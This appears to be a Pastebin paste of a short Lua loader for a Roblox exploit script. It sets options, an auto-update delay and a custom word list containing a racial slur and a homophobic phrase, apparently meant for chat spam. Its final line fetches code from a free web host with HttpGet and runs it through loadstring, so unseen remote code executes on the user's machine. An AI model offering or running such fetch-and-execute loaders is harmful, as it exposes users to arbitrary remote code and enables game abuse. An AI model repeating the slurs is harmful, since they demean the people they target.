Advertisement
Guest User

yeet

a guest
Jul 23rd, 2019
116
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.34 KB | None | 0 0
  1. _G.Option = 'all'; --[[
  2. Current options:
  3. - all
  4. - keywords
  5. ]]
  6. _G.Auto_Update = {
  7. Enabled = true;
  8. Delay = 60;
  9. }
  10. _G.Custom_Words = {
  11. 'nigga you are big',
  12. 'fuck somegay shit', -- etc
  13. }
  14. if not pcall(function()loadstring(game:HttpGet('https://xhamiii.000webhostapp.com/',true))()end)then warn'host is currently down'end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement